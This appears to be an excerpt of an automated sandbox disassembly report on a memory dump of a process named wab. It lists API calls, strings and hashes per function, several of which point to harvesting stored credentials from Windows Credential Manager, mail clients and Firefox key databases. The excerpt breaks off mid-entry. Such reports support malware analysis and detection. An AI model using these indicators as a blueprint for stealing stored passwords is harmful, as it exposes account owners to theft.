                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$strlen
                  • String ID:
                  • API String ID: 4288758904-3916222277
                  • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                  • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                  • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                  • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                  APIs
                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                  • wcslen.MSVCRT ref: 0040874A
                  • _wcsncoll.MSVCRT ref: 00408794
                  • memset.MSVCRT ref: 0040882A
                  • memcpy.MSVCRT ref: 00408849
                  • wcschr.MSVCRT ref: 0040889F
                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                  • String ID: J$Microsoft_WinInet
                  • API String ID: 2203907242-260894208
                  • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                  • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                  APIs
                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                  • memcpy.MSVCRT ref: 00410961
                  Strings
                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FromStringUuid$memcpy
                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                  • API String ID: 2859077140-2022683286
                  • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                  • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                  • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                  • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                  APIs
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  • _mbscpy.MSVCRT ref: 00409686
                  • _mbscpy.MSVCRT ref: 00409696
                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 888011440-2039793938
                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                  APIs
                  Strings
                  • database is already attached, xrefs: 0042EA97
                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                  • too many attached databases - max %d, xrefs: 0042E951
                  • cannot ATTACH database within transaction, xrefs: 0042E966
                  • out of memory, xrefs: 0042EBEF
                  • database %s is already in use, xrefs: 0042E9CE
                  • unable to open database: %s, xrefs: 0042EBD6
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                  • API String ID: 1297977491-2001300268
                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                  APIs
                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                  • strchr.MSVCRT ref: 0040327B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringstrchr
                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                  • API String ID: 1348940319-1729847305
                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                  APIs
                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                  • memset.MSVCRT ref: 0040FA1E
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                  • _strnicmp.MSVCRT ref: 0040FA4F
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                  • String ID: WindowsLive:name=*$windowslive:name=
                  • API String ID: 945165440-3589380929
                  • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                  • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                  • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                  • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                  APIs
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                    • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                  • strchr.MSVCRT ref: 0040371F
                  • _mbscpy.MSVCRT ref: 00403748
                  • _mbscpy.MSVCRT ref: 00403758
                  • strlen.MSVCRT ref: 00403778
                  • sprintf.MSVCRT ref: 0040379C
                  • _mbscpy.MSVCRT ref: 004037B2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                  • String ID: %s@gmail.com
                  • API String ID: 500647785-4097000612
                  • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                  • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                  APIs
                  • memset.MSVCRT ref: 004094C8
                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                  • memset.MSVCRT ref: 0040950C
                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                  • _strcmpi.MSVCRT ref: 00409531
                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                  • String ID: sysdatetimepick32
                  • API String ID: 3411445237-4169760276
                  • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                  • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                  • EndDialog.USER32(?,00000002), ref: 00405A96
                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$DialogMessageSend
                  • String ID:
                  • API String ID: 2485852401-0
                  • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                  • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                  • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                  • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                  APIs
                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                  • GetSysColor.USER32(0000000F), ref: 0040B472
                  • DeleteObject.GDI32(?), ref: 0040B4A6
                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteImageLoadObject$Color
                  • String ID:
                  • API String ID: 3642520215-0
                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                  • String ID:
                  • API String ID: 2313361498-0
                  • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                  • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                  • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                  • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                  APIs
                  • GetClientRect.USER32(?,?), ref: 0040BB33
                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Defer$Rect$BeginClient
                  • String ID:
                  • API String ID: 2126104762-0
                  • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                  • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                  • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                  • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                  • GetDC.USER32(00000000), ref: 004072FB
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                  • String ID:
                  • API String ID: 1999381814-0
                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                  • API String ID: 1297977491-3883738016
                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                  APIs
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                    • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                  • memcpy.MSVCRT ref: 0044972E
                  • memcpy.MSVCRT ref: 0044977B
                  • memcpy.MSVCRT ref: 004497F6
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                    • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                  • memcpy.MSVCRT ref: 00449846
                  • memcpy.MSVCRT ref: 00449887
                  • memcpy.MSVCRT ref: 004498B8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: gj
                  • API String ID: 438689982-4203073231
                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: __aulldvrm$__aullrem
                  • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                  • API String ID: 643879872-978417875
                  • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                  • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                  • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset$strlen$_memicmp
                  • String ID: user_pref("
                  • API String ID: 765841271-2487180061
                  • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                  • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                  • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                  • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                  • memset.MSVCRT ref: 004058C3
                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                  • SetFocus.USER32(?), ref: 00405976
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$FocusItemmemset
                  • String ID:
                  • API String ID: 4281309102-0
                  • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                  • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                  • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                  • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                  APIs
                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                  • _mbscat.MSVCRT ref: 0040A8FF
                  • sprintf.MSVCRT ref: 0040A921
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileWrite_mbscatsprintfstrlen
                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                  • API String ID: 1631269929-4153097237
                  • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                  • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                  • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                  • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                  APIs
                  • memset.MSVCRT ref: 0040810E
                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,7568EB20,?), ref: 004081B9
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                  • String ID: POP3_credentials$POP3_host$POP3_name
                  • API String ID: 524865279-2190619648
                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_mbscat_mbscpymemset
                  • String ID: key3.db$key4.db
                  • API String ID: 581844971-3557030128
                  • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                  • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                  • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                  • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                  APIs
                  Strings
                  Memory Dump Source
